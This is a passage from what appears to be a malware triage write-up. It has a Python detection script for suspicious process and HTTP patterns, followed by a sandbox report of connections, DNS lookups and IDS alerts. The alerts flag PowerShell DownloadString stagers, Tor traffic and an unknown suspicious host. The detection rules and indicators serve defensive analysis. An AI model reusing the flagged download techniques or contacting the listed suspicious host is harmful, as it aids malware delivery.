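        if p.parent.lower() in SCRIPT_HOSTS and image.endswith(".exe"):
            hits.append(("script_host_spawned_exe", p.pid))
    return hits


def triage_http(reqs):
    """Return (rule, pid, url) triples for network-level indicators."""
    hits = []
    head_seen = set()
    for r in reqs:
        proc = r.process.lower()
        # BITS (hosted in svchost.exe) probes a URL with HEAD, then GETs it.
        if proc == "svchost.exe":
            if r.method == "HEAD":
                head_seen.add(r.url)
            elif r.method == "GET" and r.url in head_seen:
                hits.append(("bits_style_download", r.pid, r.url))
        if proc == "powershell.exe" and urlparse(r.url).path.lower().endswith(SCRIPT_EXT):
            hits.append(("powershell_fetched_script", r.pid, r.url))
    return hits


def hosts(reqs):
    """Distinct hosts contacted over HTTP, for the IOC list."""
    return sorted({urlparse(r.url).hostname for r in reqs})


if __name__ == "__main__":
    for hit in triage_processes(PROCS) + triage_http(HTTP):
        print(*hit)
    print("hosts:", ", ".join(hosts(HTTP)))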

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
- | - | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
- | - | 2.22.242.90:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
7748 | msedge.exe | 13.107.42.16:443 | config.edge.skype.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
7436 | msedge.exe | 239.255.255.250:1900 | - | - | - | whitelisted
7748 | msedge.exe | 150.171.28.11:443 | edge.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
7748 | msedge.exe | 13.107.6.158:443 | business.bing.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
7748 | msedge.exe | 13.107.253.45:443 | edge-mobile-static.azureedge.net | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
7748 | msedge.exe | 45.58.159.53:80 | turistojoy43-001-site1.atempurl.com | ST-BGP | US | unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 4.231.128.59
whitelisted
crl.microsoft.com
  • 2.22.242.90
  • 2.22.242.121
whitelisted
google.com
  • 172.217.18.14
whitelisted
config.edge.skype.com
  • 13.107.42.16
whitelisted
edge.microsoft.com
  • 150.171.28.11
  • 150.171.27.11
whitelisted
business.bing.com
  • 13.107.6.158
whitelisted
edge-mobile-static.azureedge.net
  • 13.107.253.45
whitelisted
turistojoy43-001-site1.atempurl.com
  • 45.58.159.53
unknown
bzib.nelreports.net
  • 2.19.126.145
  • 2.19.126.152
whitelisted
update.googleapis.com
  • 142.250.185.131
whitelisted

Threats

Class | Message (the PID and Process columns are empty in this extract)
Potentially Bad Traffic | ET HUNTING PowerShell DownloadString Command Common In Powershell Stagers
Misc Attack | ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 218
Misc Attack | ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 223
Misc Attack | ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 325
Misc Attack | ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 272
Potentially Bad Traffic | SUSPICIOUS [ANY.RUN] Check Security.Principal.WindowsBuiltInRole has been detected
Misc activity | SUSPICIOUS [ANY.RUN] The Principal.WindowsIdentity in PS.Script has been detected
Potentially Bad Traffic | ET HUNTING PowerShell DownloadString Command Common In Powershell Stagers
Misc Attack | ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 218
Potentially Bad Traffic | SUSPICIOUS [ANY.RUN] Check Security.Principal.WindowsBuiltInRole has been detected
No debug info